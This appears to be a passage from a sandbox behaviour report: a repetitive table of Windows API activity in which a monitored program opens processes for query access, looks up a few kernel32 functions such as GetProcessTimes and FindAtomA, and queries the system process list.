| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
2 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessTimes, address_out = 0x765c3dc0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFindAtomA, address_out = 0x765bd0c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindAtomA, address_out = 0x765bef10 |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
